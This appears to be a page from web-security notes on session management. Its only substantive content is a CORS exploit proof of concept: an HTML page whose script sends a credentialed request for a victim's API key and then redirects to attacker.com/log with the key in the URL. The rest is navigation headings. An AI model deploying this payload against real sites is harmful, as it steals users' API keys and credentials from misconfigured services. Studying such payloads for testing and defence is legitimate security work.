Session Management
Identifiers
Predictability
Session Fixation
Stealing Sessions
CORS Exploits
<html>
<title>CORS Exploit POC</title>
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://api.m4lwhere.org/api/v1/getApiKey',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//attacker.com/log?key='+this.responseText;
};
</script>
</html>Web Tokens
References
Last updated